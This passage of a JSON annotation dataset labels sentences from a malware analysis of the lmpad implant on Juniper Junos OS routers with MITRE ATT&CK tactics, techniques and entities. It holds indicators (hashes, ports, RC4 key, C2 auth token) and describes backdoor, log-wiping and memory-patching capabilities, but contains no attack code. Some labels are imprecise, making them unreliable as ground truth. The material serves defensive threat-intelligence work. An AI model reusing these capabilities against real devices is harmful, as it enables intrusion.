"mitre", "doc_id": "95_mitre_report", "page_number": 1, "sentence_id": 3, "context_before": "The team determined that the set of six implants are indeed malicious software designed to remotely take over Junos OS devices.", "sentence_text": "The results of the team’s reverse engineering efforts are described in depth in the Malware Analysis section below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p1-s4-2ac41a", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 1, "sentence_id": 4, "context_before": "The results of the team’s reverse engineering efforts are described in depth in the Malware Analysis section below.", "sentence_text": "This indicates that a root credential may have been previously compromised as a prelude to implantation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p1-s5-27cdcb", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 1, "sentence_id": 5, "context_before": "This indicates that a root credential may have been previously compromised as a prelude to implantation.", "sentence_text": "At least one vulnerability contributed to the successful attack: a process memory injection issue, CVE-2025-21590, described in the Juniper Security Advisory available at: https://supportportal.juniper.net/JSA93446.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Exploitation of a process memory injection vulnerability (CVE-2025-21590) to enable malicious execution.", "entities": [ { "text": "a process memory injection issue,", "start": 65, "end": 98, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p1-s6-944eb1", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 1, "sentence_id": 6, "context_before": "At least one vulnerability contributed to the successful attack: a process memory injection issue, CVE-2025-21590, described in the Juniper Security Advisory available at: https://supportportal.juniper.net/JSA93446.", "sentence_text": "The search for other vulnerabilities that may have been exploited was constrained by the forensic evidence available to the team and complicated by the fact that the target devices were running out-of-support versions of the Junos OS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p1-s7-c89130", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 1, "sentence_id": 7, "context_before": "The search for other vulnerabilities that may have been exploited was constrained by the forensic evidence available to the team and complicated by the fact that the target devices were running out-of-support versions of the Junos OS.", "sentence_text": "To assist customers and others to identify the implants, hashes for each of the malware binaries are available in the Malware Analysis section below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p1-s8-6b6cfc", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 1, "sentence_id": 8, "context_before": "To assist customers and others to identify the implants, hashes for each of the malware binaries are available in the Malware Analysis section below.", "sentence_text": "See malware-removal-tool.html Juniper recommends that customers consider upgrading to the set of Junos OS releases cited in JSA93446, which contain the CVE fix as well as updated signatures for the JMRT.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p2-s9-6d4957", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 9, "context_before": "See malware-removal-tool.html Juniper recommends that customers consider upgrading to the set of Junos OS releases cited in JSA93446, which contain the CVE fix as well as updated signatures for the JMRT.", "sentence_text": "Malware Analysis\nThis section describes the findings made during the reverse engineering effort, which included decomposition of each malware binary, static analysis of its metadata and flow, and an impact analysis on how it could affect Junos OS at run-time.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p2-s10-668ca7", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 10, "context_before": "Malware Analysis\nThis section describes the findings made during the reverse engineering effort, which included decomposition of each malware binary, static analysis of its metadata and flow, and an impact analysis on how it could affect Junos OS at run-time.", "sentence_text": "All malware samples analyzed target Junos OS, Juniper Networks' FreeBSD-based operating system.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p2-s11-1c6e52", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 11, "context_before": "All malware samples analyzed target Junos OS, Juniper Networks' FreeBSD-based operating system.", "sentence_text": "The following malware implants were recovered from the MX Series routers:\n1.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p2-s12-6b6700", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 12, "context_before": "The following malware implants were recovered from the MX Series routers:\n1.", "sentence_text": "The Local Memory Patching Attack Daemon (lmpad)\n2.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p2-s13-bb5a3d", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 13, "context_before": "The Local Memory Patching Attack Daemon (lmpad)\n2.", "sentence_text": "The Junos Denial of Service Daemon (jdosd)\n3.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p2-s14-694ab6", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 14, "context_before": "The Junos Denial of Service Daemon (jdosd)\n3.", "sentence_text": "The Internet Remote Access Daemon (irad)\n4.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p2-s15-2805d8", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 15, "context_before": "The Internet Remote Access Daemon (irad)\n4.", "sentence_text": "A Poorly Plagiarized Implant Daemon (appid)\n5.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p2-s16-8953c5", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 16, "context_before": "A Poorly Plagiarized Implant Daemon (appid)\n5.", "sentence_text": "The TooObvious (to)\n6.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p2-s17-ff1482", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 17, "context_before": "The TooObvious (to)\n6.", "sentence_text": "The Obscure Enigmatic Malware Daemon (oemd)\nNOTE:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p2-s18-999317", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 18, "context_before": "The Obscure Enigmatic Malware Daemon (oemd)\nNOTE:", "sentence_text": "These names were crafted by Juniper based on malware behavior.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p2-s19-350b9b", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 19, "context_before": "These names were crafted by Juniper based on malware behavior.", "sentence_text": "They were not used by the malware authors themselves.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p2-s20-383596", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 20, "context_before": "They were not used by the malware authors themselves.", "sentence_text": "Local Memory Patching Attack Daemon (lmpad)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p2-s21-255cec", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 21, "context_before": "Local Memory Patching Attack Daemon (lmpad)", "sentence_text": "The \"Local Memory Patching Attack Daemon\" or lmpad is an implant designed to perform a local memory patching attack on snmpd and mgd.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "lmpad performs local memory patching against snmpd and mgd to evade defenses.", "entities": [ { "text": "Local Memory Patching Attack Daemon\" or lmpad", "start": 5, "end": 50, "label": "MalwareTool" }, { "text": " to perform a local memory patching attack ", "start": 73, "end": 116, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p2-s22-a133fd", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 22, "context_before": "The \"Local Memory Patching Attack Daemon\" or lmpad is an implant designed to perform a local memory patching attack on snmpd and mgd.", "sentence_text": "It also has the capability to provide a persistent backdoor and delete any logs associated with unauthorized access.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "Provides a persistent backdoor and deletes logs to hide unauthorized access.", "entities": [ { "text": " backdoor", "start": 50, "end": 59, "label": "Action" }, { "text": "to provide a persistent backdoor and delete any logs", "start": 27, "end": 79, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p2-s23-3b389f", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 23, "context_before": "It also has the capability to provide a persistent backdoor and delete any logs associated with unauthorized access.", "sentence_text": "This implant performs actions intended to specifically target Junos OS.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": null, "procedure": "The implant targets Junos OS.", "entities": [ { "text": "implant", "start": 5, "end": 12, "label": "MalwareTool" }, { "text": "target Junos OS", "start": 55, "end": 70, "label": "Action" }, { "text": "Junos OS", "start": 62, "end": 70, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p2-s24-987ec7", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 24, "context_before": "This implant performs actions intended to specifically target Junos OS.", "sentence_text": "Executable File Details", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p2-s25-3314a5", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 25, "context_before": "Executable File Details", "sentence_text": "Two variants of lmpad were found in the field.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p2-s26-2e04d6", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 26, "context_before": "Two variants of lmpad were found in the field.", "sentence_text": "While these variants do not do anything drastically different in function, they have different ports of operation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p2-s27-410a9e", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 27, "context_before": "While these variants do not do anything drastically different in function, they have different ports of operation.", "sentence_text": "The more common variant of lmpad opens port 33615 to listen to commands while the other variant opens port 33568.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "lmpad opens network ports to receive remote commands.", "entities": [ { "text": "lmpad", "start": 27, "end": 32, "label": "MalwareTool" }, { "text": "opens port 33615 to listen to commands", "start": 33, "end": 71, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p2-s28-01cd08", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 28, "context_before": "The more common variant of lmpad opens port 33615 to listen to commands while the other variant opens port 33568.", "sentence_text": "This is the only difference between the two variants of lmpad and can be seen in the following bytes:\n--- lmpad-xxd 2024-08-12 11:13:44 +++ lmpad2-xxd 2024-08-12 11:13:33 @@ -624,7", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p2-s29-66713c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 29, "context_before": "This is the only difference between the two variants of lmpad and can be seen in the following bytes:\n--- lmpad-xxd 2024-08-12 11:13:44 +++ lmpad2-xxd 2024-08-12 11:13:33 @@ -624,7", "sentence_text": "+00002720: 3062 3431 6431 6165 3200 3333 3536 3800 0b41d1ae2.33568.\n00002730: 2f76 6172 2f72 756e 2f73 6e6d 7064 2e70 /var/run/snmpd.p 00002740: 6964 002f 7661 722f 746d 702f 7274 7300 id./var/tmp/rts.\n00002750:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p2-s30-40a4ad", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 30, "context_before": "+00002720: 3062 3431 6431 6165 3200 3333 3536 3800 0b41d1ae2.33568.\n00002730: 2f76 6172 2f72 756e 2f73 6e6d 7064 2e70 /var/run/snmpd.p 00002740: 6964 002f 7661 722f 746d 702f 7274 7300 id./var/tmp/rts.\n00002750:", "sentence_text": "2f76 6172 2f72 756e 2f6d 6764 2e70 6964 /var/run/mgd.pid Details for both variants are given below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p2-s31-f6c968", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 2, "sentence_id": 31, "context_before": "2f76 6172 2f72 756e 2f6d 6764 2e70 6964 /var/run/mgd.pid Details for both variants are given below.", "sentence_text": "Variant 1\nTitle Description\nFile Name lmpad", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p3-s32-9b7dc9", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 3, "sentence_id": 32, "context_before": "Variant 1\nTitle Description\nFile Name lmpad", "sentence_text": "File Path /usr/sbin/lmpad lmpad: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), File Type dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 6.4, stripped File Size 17664", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p3-s33-04cb89", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 3, "sentence_id": 33, "context_before": "File Path /usr/sbin/lmpad lmpad: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), File Type dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 6.4, stripped File Size 17664", "sentence_text": "bytes SHA1 Hash f8697b400059d4d5082eee2d269735aa8ea2df9a SHA256 Hash 5995aaff5a047565c0d7fe3c80fa354c40e7e8c3e7d4df292316c8472d4ac67a ssdeep Hash 384:CEszodppMrBuGjILpAGte/GgSziNrhJq:9dDwzjIVAGqGBk Variant 2 Title Description File Name lmpad File Path /usr/sbin/lmpad lmpad: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), File Type dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 6.4, stripped 17664 bytes", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p3-s34-0042da", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 3, "sentence_id": 34, "context_before": "bytes SHA1 Hash f8697b400059d4d5082eee2d269735aa8ea2df9a SHA256 Hash 5995aaff5a047565c0d7fe3c80fa354c40e7e8c3e7d4df292316c8472d4ac67a ssdeep Hash 384:CEszodppMrBuGjILpAGte/GgSziNrhJq:9dDwzjIVAGqGBk Variant 2 Title Description File Name lmpad File Path /usr/sbin/lmpad lmpad: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), File Type dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 6.4, stripped 17664 bytes", "sentence_text": "File Size SHA1 Hash 2e9215a203e908483d04dfc0328651d79d35b54f SHA256 Hash 7ae38a27494dd6c1bc9ab3c02c3709282e0ebcf1e5fcf59a57dc3ae56cfd13b4 ssdeep Hash 384:CEszodppMrBuGjILpAGte/GgSziQrhJq:9dDwzjIVAGqGBt Implant Analysis The implant lmpad is a targeted implant for Junos OS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p3-s35-2c15ad", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 3, "sentence_id": 35, "context_before": "File Size SHA1 Hash 2e9215a203e908483d04dfc0328651d79d35b54f SHA256 Hash 7ae38a27494dd6c1bc9ab3c02c3709282e0ebcf1e5fcf59a57dc3ae56cfd13b4 ssdeep Hash 384:CEszodppMrBuGjILpAGte/GgSziQrhJq:9dDwzjIVAGqGBt Implant Analysis The implant lmpad is a targeted implant for Junos OS.", "sentence_text": "At a high level, it listens on port 33615 or 33568 on local interface lo0 for commands.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Listens on ports 33615/33568 on local interface to receive commands.", "entities": [ { "text": " listens on", "start": 19, "end": 30, "label": "Infrastructure_Indicator" }, { "text": "port 33615 or 33568", "start": 31, "end": 50, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p3-s36-86cdaa", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 3, "sentence_id": 36, "context_before": "At a high level, it listens on port 33615 or 33568 on local interface lo0 for commands.", "sentence_text": "Since lmpad listens on a local interface, the command and control (C2) must come from another process on the infected device.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.001", "name": "Internal Proxy" } ], "procedure": "C2 communications are routed internally from another process on the infected device.", "entities": [ { "text": "lmpad", "start": 6, "end": 11, "label": "MalwareTool" }, { "text": "listens on a local interface,", "start": 12, "end": 41, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p3-s37-f64ff4", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 3, "sentence_id": 37, "context_before": "Since lmpad listens on a local interface, the command and control (C2) must come from another process on the infected device.", "sentence_text": "On receiving commands, it performs actions such as:\n1.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": null, "procedure": "The implant receives commands and performs actions.", "entities": [ { "text": "receiving commands", "start": 3, "end": 21, "label": "Action" }, { "text": "performs actions", "start": 26, "end": 42, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p3-s38-ca9428", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 3, "sentence_id": 38, "context_before": "On receiving commands, it performs actions such as:\n1.", "sentence_text": "Overwriting daemon memory for snmpd and mgd 2.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Overwrites memory of snmpd and mgd daemons to support malicious operation.", "entities": [ { "text": "Overwriting daemon memory", "start": 0, "end": 25, "label": "Action" }, { "text": " snmpd and mgd 2", "start": 29, "end": 45, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p3-s39-91bfe2", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 3, "sentence_id": 39, "context_before": "Overwriting daemon memory for snmpd and mgd 2.", "sentence_text": "Performing pre-exploitation preparation 3.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p3-s40-31dafc", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 3, "sentence_id": 40, "context_before": "Performing pre-exploitation preparation 3.", "sentence_text": "Performing post-exploitation cleanup 4.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p3-s41-b5f815", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 3, "sentence_id": 41, "context_before": "Performing post-exploitation cleanup 4.", "sentence_text": "Reading arbitrary files 5.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p3-s42-05b9d7", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 3, "sentence_id": 42, "context_before": "Reading arbitrary files 5.", "sentence_text": "Writing arbitrary files", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p4-s43-4f0398", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 4, "sentence_id": 43, "context_before": "Writing arbitrary files", "sentence_text": "Executing a /usr/bin/csh shell This implant also contains an embedded shell script which is deployed on the device to perform some of the above actions and then cleaned up later.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Executes a csh command shell and deploys a temporary embedded script to perform actions and then remove itself.", "entities": [ { "text": "to perform some of the above actions and then cleaned up later.", "start": 115, "end": 178, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p4-s44-0e7a4d", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 4, "sentence_id": 44, "context_before": "Executing a /usr/bin/csh shell This implant also contains an embedded shell script which is deployed on the device to perform some of the above actions and then cleaned up later.", "sentence_text": "This implant uses the RC4 cipher to encrypt outgoing messages and decrypt incoming messages with key the hardcoded ASCII key \"0b3330c0b41d1ae2\".", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Uses RC4 encryption to secure C2 communications with a hardcoded key.", "entities": [ { "text": "to encrypt outgoing messages and decrypt incoming messages", "start": 33, "end": 91, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p4-s45-3780d0", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 4, "sentence_id": 45, "context_before": "This implant uses the RC4 cipher to encrypt outgoing messages and decrypt incoming messages with key the hardcoded ASCII key \"0b3330c0b41d1ae2\".", "sentence_text": "Artifacts Found\nArtifact Name Description A hardcoded RC4 key \"0b3330c0b41d1ae2\" was found at offset 0x2719 in the lmpad RC4", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p4-s46-e44040", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 4, "sentence_id": 46, "context_before": "Artifacts Found\nArtifact Name Description A hardcoded RC4 key \"0b3330c0b41d1ae2\" was found at offset 0x2719 in the lmpad RC4", "sentence_text": "Key binary A hardcoded GZIP'ed shell script was found at offset 0x376c in the lmpad binary.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p4-s47-8d863c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 4, "sentence_id": 47, "context_before": "Key binary A hardcoded GZIP'ed shell script was found at offset 0x376c in the lmpad binary.", "sentence_text": "The GZIPed Script uncompressed script can be found in Appendix A.\nA hardcoded auth token used to authenticate the C2 was discovered.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p4-s48-5fb023", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 4, "sentence_id": 48, "context_before": "The GZIPed Script uncompressed script can be found in Appendix A.\nA hardcoded auth token used to authenticate the C2 was discovered.", "sentence_text": "The value of the Auth Token token is \\x26\\xe7\\x2b\\x3a\\x1c\\xa2\\x16\\x2d\\x61\\x89\\x57\\xa9\\xcd\\ x4c\\xe7\\x3c Function Summary The lmpad implant contains three major functions once it is decompiled.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p4-s49-dcd901", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 4, "sentence_id": 49, "context_before": "The value of the Auth Token token is \\x26\\xe7\\x2b\\x3a\\x1c\\xa2\\x16\\x2d\\x61\\x89\\x57\\xa9\\xcd\\ x4c\\xe7\\x3c Function Summary The lmpad implant contains three major functions once it is decompiled.", "sentence_text": "These functions have been renamed for the ease of the reader.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p4-s50-bb4a5f", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 4, "sentence_id": 50, "context_before": "These functions have been renamed for the ease of the reader.", "sentence_text": "They are explained in detail in the sections below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p4-s51-a13b91", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 4, "sentence_id": 51, "context_before": "They are explained in detail in the sections below.", "sentence_text": "This may be an obfuscation technique used by the malware author.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Malware authors use obfuscation to avoid detection and hinder analysis.", "entities": [ { "text": "obfuscation technique used by", "start": 15, "end": 44, "label": "Action" }, { "text": "malware author", "start": 49, "end": 63, "label": "MalwareTool" } ] }, { "uid": "mitre-95_mitre_report-p4-s52-339fd7", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 4, "sentence_id": 52, "context_before": "This may be an obfuscation technique used by the malware author.", "sentence_text": "main_loop()\nThis function is the main entry point for this implant.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p4-s53-bdbb48", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 4, "sentence_id": 53, "context_before": "main_loop()\nThis function is the main entry point for this implant.", "sentence_text": "After this, some reads and writes are performed on this socket which do not seem to result in anything actionable.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p4-s54-2eeb1c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 4, "sentence_id": 54, "context_before": "After this, some reads and writes are performed on this socket which do not seem to result in anything actionable.", "sentence_text": "Once this is done, the implant forks a child process.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "The implant forks a child process.", "entities": [ { "text": "implant", "start": 23, "end": 30, "label": "MalwareTool" }, { "text": "forks a child process", "start": 31, "end": 52, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p4-s55-36f69f", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 4, "sentence_id": 55, "context_before": "Once this is done, the implant forks a child process.", "sentence_text": "The parent process in this case maps a few buffers in memory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p4-s56-84c81c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 4, "sentence_id": 56, "context_before": "The parent process in this case maps a few buffers in memory.", "sentence_text": "| MAP_NOCORE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p5-s57-8dab55", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 57, "context_before": "| MAP_NOCORE", "sentence_text": "This means that if this daemon were to dump core, the core would not contain the contents of these buffers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p5-s58-ec5648", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 58, "context_before": "This means that if this daemon were to dump core, the core would not contain the contents of these buffers.", "sentence_text": "The child process, on the other hand, calls dlopen(3) on libcrypto.so.3.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p5-s59-c78bee", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 59, "context_before": "The child process, on the other hand, calls dlopen(3) on libcrypto.so.3.", "sentence_text": "It uses dlsym() to locate the symbol RC4_set_key and uses this function to initialize the RC4 key mentioned above in a buffer.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Loads RC4 crypto functionality and initializes a symmetric key for encrypted C2 communications.", "entities": [ { "text": "to initialize the RC4 key", "start": 72, "end": 97, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p5-s60-ba62b5", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 60, "context_before": "It uses dlsym() to locate the symbol RC4_set_key and uses this function to initialize the RC4 key mentioned above in a buffer.", "sentence_text": "Once this is done, this function starts listening on either port 33615 or port 33568 and address 0.0.0.0.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Malware listens on all interfaces using ports 33615 or 33568 to receive remote C2 commands.", "entities": [ { "text": "port 33615 or port 33568", "start": 60, "end": 84, "label": "Infrastructure_Indicator" }, { "text": "starts listening", "start": 33, "end": 49, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p5-s61-7814aa", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 61, "context_before": "Once this is done, this function starts listening on either port 33615 or port 33568 and address 0.0.0.0.", "sentence_text": "If this is successful, it reads 128 bytes from this socket.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Reads data from socket to receive C2 instructions (128 bytes).", "entities": [ { "text": " reads 128 bytes from this socket", "start": 25, "end": 58, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p5-s62-134755", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 62, "context_before": "If this is successful, it reads 128 bytes from this socket.", "sentence_text": "If this read is successful, then it connects to this socket and reads a further 16 bytes from this socket and decrypts them using RC4.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p5-s63-257b0b", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 5, "sentence_id": 63, "context_before": "If this read is successful, then it connects to this socket and reads a further 16 bytes from this socket and decrypts them using RC4.", "sentence_text": "The received (and decrypted) bytes are then compared to the buffer \\x26\\xe7\\x2b\\x3a\\x1c\\xa2\\x16\\x2d\\x61\\x89\\x57\\xa9\\xcd\\x4c\\xe7\\x3c.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Validates C2 message by comparing decrypted bytes to a hardcoded authentication token.", "entities": [ { "text": "received (and decrypted", "start": 4, "end": 27, "label": "Action" } ] }, { "uid": 